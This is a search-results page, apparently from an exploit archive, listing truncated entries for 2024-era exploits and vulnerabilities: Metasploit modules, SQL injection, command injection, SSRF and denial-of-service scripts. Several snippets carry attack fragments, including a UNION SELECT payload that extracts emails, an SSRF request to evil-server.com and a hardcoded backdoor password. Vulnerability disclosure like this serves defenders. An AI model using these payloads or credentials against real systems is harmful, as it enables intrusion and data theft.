39001 matches found
Proxmox VE - TOTP Brute Force Exploit
Exploit Title: Proxmox VE TOTP Brute Force Exploit Author: Cory Cline, Gabe Rust Vendor Homepage: https://www.proxmox.com/en/ Software Link: http://download.proxmox.com/iso/ Version: 5.4 - 7.4-1 Tested on: Debian CVE : CVE-2023-43320 import time import requests import urllib.parse import json...
Mirth Connect 4.4.0 Remote Command Execution Exploit
A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the target application. The original vulnerability was identified by IHTeam and...
Grocy <= 4.0.2 - CSRF Vulnerability
Exploit Title: Grocy history.pushState'','', '/'; document.forms0.submit; If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials Username: hacker Password: test Note: In order for this to work, the target must have Crea...
TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account Vulnerability
TELSAT marKoni FM Transmitter version 1.9.5 has a hidden super administrative account factory that has the hardcoded password inokram25 that allows full access to the web management interface configuration. TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account Vendor: TELSAT Srl Product web page:...
TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection Exploit
TELSAT marKoni FM Transmitter version 1.9.5 is susceptible to unauthenticated remote code execution with root privileges. An attacker can exploit a command injection vulnerability by manipulating the Email settings' WAN IP info service, which utilizes the wget module. This allows the attacker to...
7 Sticky Notes v1.9 - OS Command Injection Vulnerability
Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection Discovered by: Ahmet Ümit BAYRAM Vendor Homepage: http://www.7stickynotes.com Software Link: http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe Tested Version: 1.9 latest Tested on: Windows 2019 Server 64bit Steps to Reproduce...
Bank Locker Management System - SQL Injection Vulnerability
Exploit Title: Bank Locker Management System - SQL Injection Application: Bank Locker Management System Bugs: SQL Injection Exploit Author: SoSPiro Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/ Tested on: Windows ...
Blood Bank & Donor Management System using v2.2 - Stored XSS Vulnerability
Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS Application: Blood Donor Management System Version: v2.2 Bugs: Stored XSS Technology: PHP Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/...
Vinchin Backup And Recovery 7.2 Default Root Credentials Vulnerability
Vinchin Backup and Recovery version 7.2 has been identified as being configured with default root credentials, posing a significant security vulnerability. CVE ID: CVE-2024-22902 Title: Default Root Credentials Vulnerability in Vinchin Backup & Recovery v7.2 Suggested Description: Vinchin Backup ...
Vinchin Backup And Recovery 7.2 syncNtpTime Command Injection Vulnerability
Vinchin Backup and Recovery versions 7.2 and below suffer from a command injection vulnerability in the syncNtpTime function. CVE ID: CVE-2024-22899 Title: Command Injection Vulnerability in Vinchin Backup and Recovery's syncNtpTime Function in Versions 7.2 and Earlier Description: A critical...
Ricoh Printer - Directory and File Exposure Exploit
Exploit Title: Ricoh Printer Directory and File Exposure Exploit Author: Thomas Heverin Heverin Hacker Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Findermain.py Version: Ricoh Printers - All...
Typora v1.7.4 - OS Command Injection Vulnerability
Exploit Title: Typora v1.7.4 - OS Command Injection Discovered by: Ahmet Ümit BAYRAM Vendor Homepage: http://www.typora.io Software Link: https://download.typora.io/windows/typora-setup-ia32.exe Tested Version: v1.7.4 latest Tested on: Windows 2019 Server 64bit Steps to Reproduce Open the...
Atlassian Confluence SSTI Injection Exploit
This Metasploit module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable. This module requires...
Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read Exploit
Jenkins versions 2.441 and below and LTS 2.426.3 and below remote arbitrary file read proof of concept exploit written in Python. python poc.py usage: python poc.py http://127.0.0.1:8888/ /etc/passwd import threading import http.client import time import uuid import urllib.parse import sys if...
CSZCMS 1.3.0 SQL Injection Vulnerability
Title: CSZCMS v1.3.0 - SQL Injection Author: Abdulaziz Almetairy Vendor: https://www.cszcms.com/ Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download Reference: https://github.com/oh-az Tested on: Windows 11, MySQL, Apache 1 - Log in to the admin portal...
Chrome 121 Javascript Fork Malloc Bomb Exploit
Chrome version 121 suffers from a javascript fork malloc vulnerability that indicates memory corruption upon crash. Searching the web for javascript fork malloc bomb returns results, e.g. here1: and here2: We got a javascript fork malloc bomb which crashed Chrome 121 on linux with SIGILL and abou...
Vinchin Backup And Recovery 7.2 SystemHandler.class.php Command Injection Vulnerability
CVE ID: CVE-2024-22903 Title: Command Injection Vulnerability in SystemHandler.class.php of Vinchin Backup & Recovery Versions 7.2 and Earlier Description: A significant security vulnerability, CVE-2024-22903, has been identified in the deleteUpdateAPK function within the SystemHandler.class.php...
Vinchin Backup And Recovery 7.2 setNetworkCardInfo Command Injection Vulnerability
Vinchin Backup and Recovery versions 7.2 and below suffer from a command injection vulnerability in the setNetworkCardInfo function. CVE ID: CVE-2024-22900 Title: Command Injection Vulnerability in Vinchin Backup and Recovery Versions 7.2 and Earlier Description: A critical security vulnerability...
CloudLinux CageFS 7.0.8-2 Insufficiently Restricted Proxy Command Vulnerability
CloudLinux CageFS versions 7.0.8-2 and below insufficiently restrict file paths supplied to the sendmail proxy command. This allows local users to read and write arbitrary files of certain file formats outside the CageFS environment. CloudLinux CageFS Insufficiently Restricted Proxy Command Link:...
Reprise License Manager 15.1 Privilege Escalation / File Write Vulnerabilities
Multiple Vulnerabilities in Reprise License Manager 15.1 CVE-2023-43183, CVE-2023-44031 Credit: Mohaiman Rahim...
Saltstack Minion Payload Deployer Exploit
This Metasploit exploit module uses saltstack salt to deploy a payload and run it on all targets which have been selected default all. Currently only works against nix targets. This module requires Metasploit: https://metasploit.com/download Current source:...
GL.iNet Unauthenticated Remote Command Execution Exploit
A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker to inject and execute arbitrary shell commands via JSON parameters at the glsystemlog and glcrashlog interface in the logread module. This Metasploit exploit requires post-authentication using the...
PRTG Authenticated Remote Code Execution Exploit
class MetasploitModule 'PRTG CVE-2023-32781 Authenticated RCE', 'Description' = %q Authenticated RCE in Paessler PRTG , 'License' = MSFLICENSE, 'Author' = 'Kevin Joensen ', 'References' = 'URL', 'https://baldur.dk/blog/prtg-rce.html', 'CVE', '2023-32781' , 'DisclosureDate' = '2023-08-09',...
ProSysInfo TFTP Server TFTPDWIN 0.4.2 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket::INET; Exploit Title: ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 20 january 2024 Vendor Homepage: N/A Download to demo: https://drive.google.com/file/d/1MLqBkCyu0dA-cNgYxCAO8xbsVcof060Z/view?usp=sharin...
Ivanti Connect Secure Unauthenticated Remote Code Execution Exploit
This Metasploit module chains an authentication bypass vulnerability and a command injection vulnerability to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x prior...
xbtitFM 4.1.18 SQL Injection / Shell Upload / Traversal Vulnerabilities
xbtitFM versions 4.1.18 and below suffer from remote shell upload, remote SQL injection, and path traversal vulnerabilities. Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities Exploit Author: Who cares anyway Vendor Homepage: https://xbtitfm.eu Affected versions: 4.1.18 and prior CVE : Who...
Golden FTP Server 2.02b Denial Of Service Exploit
!/usr/bin/perl use IO::Socket::INET; Exploit Title: Golden FTP Server 2.02b - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 21 january 2024 Vendor Homepage: N/A Download to demo: https://drive.google.com/file/d/1AK6x0xKwjVZxoNHbCOIJsIiRAWeMmP0/view?usp=sharing Notification...
EzServer 6.4.017 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket; Exploit Title: EzServer 6.4.017 - Denied of Service DoS Discovery by: Fernando Mengali Discovery Date: 22 january 2024 Vendor Homepage: N/A Download to demo: https://drive.google.com/file/d/1hCYYsWsyeuoHTh3ZosNRbtIBxw0culsu/view?usp=sharing Notification vendor: No...
MajorDoMo Command Injection Exploit
This Metasploit module exploits a command injection vulnerability in MajorDoMo versions before 0662e5e. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'MajorDoMo Command Injection', 'Descriptio...
Traceroute 2.1.2 Privilege Escalation Vulnerability
In Traceroute versions 2.0.12 through to 2.1.2, the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts include tcptraceroute, tracepath, traceproto, and traceroute-nanog. Version 2.1.3...
Ansible Agent Payload Deployer Exploit
This exploit module creates an ansible module for deployment to nodes in the network. It creates a new yaml playbook which copies our payload, chmods it, then runs it on all targets which have been selected default all. This module requires Metasploit: https://metasploit.com/download Current...
Lepton CMS 7.0.0 Remote Code Execution Vulnerability
Exploit Title: LeptonCMS Version : 7.0.0 Remote Code Execution Exploit Author: tmrswrr Category: Webapps Vendor Homepage: https://www.lepton-cms.com/ Version : 7.0.0 Tested on: https://www.softaculous.com/apps/cms/LEPTON 1 Login with admin cred https://127.0.0.1/LEPTON/backend/login/index.php 2 G...
SpyCamLizard 1.230 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket::INET; Exploit Title: SpyCamLizard 1.230 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 18 january 2024 Vendor Homepage: http://www.spycamlizard.com Download to demo:...
Firefox 121 / Chrome 120 Denial Of Service Exploit
Minor firefox DoS - semi silently polluting /Downloads with files part 2 Tested on: firefox 121 and chrome 120 on GNU/linux Date: Thu Jan 18 08:38:28 AM UTC 2024 This is barely a DoS, but since it might affect Chrome too we decided to disclose it. If firefox user visits a specially crafted page,...
MiniWeb HTTP Server 0.8.1 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket; Exploit Title: MiniWeb HTTP Server 0.8.1 - Denied of Service DoS Discovery by: Fernando Mengali Discovery Date: 19 january 2024 Vendor Homepage: N/A Download to demo: https://drive.google.com/file/d/1AVHSlsYj5Ukw9co9M2Ql6RsqCTzbI038/view?usp=sharing Notification...
Linux 5.6 io_uring Cred Refcount Overflow Exploit
Linux versions 5.6 and above appear to suffer from a cred refcount overflow when handling approximately 39 gigabytes of memory usage via iouring. Linux =5.6: cred refcount overflow at 39 GiB memory usage via iouring see also my related prior bug reports about overflowing refcounts with lots of RA...
WordPress Backup Migration 1.3.7 Remote Command Execution Exploit
This Metasploit module exploits an unauthenticated remote command execution vulnerability in WordPress Backup Migration plugin versions 1.3.7 and below. The vulnerability is exploitable through the Content-Dir header which is sent to the /wp-content/plugins/backup-backup/includes/backup-heart.php...
Apache Commons Text 1.9 Remote Code Execution Exploit
This Metasploit module exploit takes advantage of the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to remote code execution. This is due to a logic flaw that makes the script, dns and url lookup...
Easy File Sharing FTP 3.6 Denial Of Service Exploit
!/usr/bin/perl use Net::FTP; Exploit Title: Easy File Sharing FTP Server 3.6 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 17 january 2024 Vendor Homepage: N/A Download to demo: Notification vendor: No reported Tested Version: Easy File Sharing FTP Server 3.6 Tested on:...
Korenix JetNet Series Unauthenticated Access Exploit
------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| Korenix JetNet Series vulnerable version| See "Vulnerable versions" fixed version| - CVE number| CVE-2023-5376, CVE-2023-5347 impact| High homepage| https://www.korenix.com/...
MailCarrier 2.51 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket::INET Exploit Title: MailCarrier 2.51 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 16 january 2024 Tested Version: MailCarrier 2.51 Tested on: Window XP Professional - Service Pack 2 and 3 - English Vulnerability Type: Denial of Service DoS ...
LightFTP 1.1 Denial Of Service Exploit
!/usr/bin/perl use Net::FTP; Exploit Title: LightFTP 1.1 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 15 january 2024 Vendor Homepage: N/A Notification vendor: No reported Tested Version: LightFTP 1.1 Tested on: Window XP Professional - Service Pack 2 and 3 - English...
SimpleWebServer 2.2-rc2 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket::INET; Exploit Title: PSimpleWebServer 2.2-rc2 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 11 january 2024 Vendor Homepage: http://www.pmx.it/ Download to demo:...
Quick TFTP Server Pro 2.1 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket::INET; Exploit Title: Quick TFTP Server Pro 2.1 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 12 january 2024 Vendor Homepage: https://www.tallsoft.com/ Download to demo:...
Taokeyun SQL Injection Vulnerability
!/bin/bash Variables url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php" cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -" Construct the request request="POST $url HTTP/1.1\r\n" request+="Content-Type: application/x-www-form-urlencoded\r\n"...
WordPress RSVPMaker 9.3.2 SQL Injection Vulnerability
!/bin/bash Set the URL of the website running the vulnerable plugin url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php" Set the number of columns in the query columns=5 response=$curl -s "$url" query=$echo "$response" | grep -oP 'FROM . WHERE .' payload="' UNION SELECT...
Xitami 2.5 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket::INET; Exploit Title: Xitami 2.5 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 14 january 2024 Vendor Homepage: https://imatix-legacy.github.io/xitami.com/ Download to demo:...
HaoKeKeJi YiQiNiu Server Side Request Forgery Vulnerability
!/bin/bash Set target URL and payload targeturl="http://example.com/application/pay/controller/Api.php" payload="url=http://evil-server.com/exploit" Send the malicious request response=$curl -s -X POST -d "$payload" "$targeturl" Check if the exploit was successful if echo "$response" | grep -q...
ProSSHD 1.2 20090726 Denial Of Service Exploit
!/usr/bin/perl use Net::SSH2 Exploit Title: ProSSHD 1.2 20090726 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 13 january 2024 Vendor Homepage: https://prosshd.com/ Notification vendor: No reported Tested Version: ProSSHD 1.2 20090726 Tested on: Window XP Professional -...
freeSSHd 1.0.9 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket; Exploit Title: freeSSHd 1.0.9 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 13 january 2024 Vendor Homepage: N/A Download to demo: Notification vendor: No reported Tested Version: freeSSHd 1.0.9 - Denial of Service DoS Tested on: Window XP...